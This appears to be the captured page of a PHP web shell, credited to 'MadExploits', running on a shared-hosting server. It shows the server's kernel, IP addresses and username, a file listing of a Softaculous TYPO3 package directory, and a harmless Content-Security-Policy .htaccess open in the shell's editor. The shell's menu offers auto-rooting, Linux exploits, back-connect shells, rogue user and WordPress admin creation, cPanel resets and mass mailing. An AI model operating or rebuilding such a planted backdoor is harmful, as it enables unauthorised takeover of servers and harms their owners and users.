Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.133.117.107
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
typo7 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
312
B
-rw-r--r--
Pbkdf2Salt.php
781
B
-rw-r--r--
_.htaccess
14.66
KB
-rw-r--r--
_upgrade.php
4.08
KB
-rw-r--r--
_upgrade.xml
452
B
-rw-r--r--
edit.php
6.75
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
file_.htaccess
348
B
-rw-r--r--
file_index.html
116
B
-rw-r--r--
fileadmin.htaccess
1.88
KB
-rw-r--r--
fileindex.php
91
B
-rw-r--r--
import.php
5.78
KB
-rw-r--r--
info.xml
3.79
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
19.22
KB
-rw-r--r--
install.xml
733
B
-rw-r--r--
md5
1.51
KB
-rw-r--r--
notes.txt
1.39
KB
-rw-r--r--
settings.php
3.63
KB
-rw-r--r--
typo7.sql
52.97
KB
-rw-r--r--
typo7.zip
32.79
MB
-rw-r--r--
update_pass.php
767
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fileadmin.htaccess
# This file applies Content-Security-Policy (CSP) HTTP headers # to directories containing (user uploaded) resources like # /fileadmin/ or /uploads/ <IfModule mod_headers.c> # matching requested *.pdf files only (strict rules block Safari showing PDF documents) <FilesMatch "\.pdf$"> Header set Content-Security-Policy "default-src 'self' 'unsafe-inline'; script-src 'none'; object-src 'self'; plugin-types application/pdf;" </FilesMatch> # matching requested *.svg files only (allows using inline styles when serving SVG files) <FilesMatch "\.svg"> Header set Content-Security-Policy "default-src 'self'; script-src 'none'; style-src 'unsafe-inline'; object-src 'none';" </FilesMatch> # matching anything else, using negative lookbehind pattern <FilesMatch "(?<!\.(?:pdf|svg))$"> Header set Content-Security-Policy "default-src 'self'; script-src 'none'; style-src 'none'; object-src 'none';" </FilesMatch> # ================================================================= # Variations to send CSP header only when it has not be set before. # Adjust all `Header set` instructions above # Header set Content-Security-Policy "<directives>" # with substitutes shown below # # ----------------------------------------------------------------- # a) for Apache 2.4 (having `setifempty`) # ----------------------------------------------------------------- # Header setifempty Content-Security-Policy "<directives>" # # ----------------------------------------------------------------- # b) for Apache 2.2 (using fallbacks) # ----------------------------------------------------------------- # Header append Content-Security-Policy "" # Header edit Content-Security-Policy "^$" "<directives>" # # ================================================================= </IfModule>
Close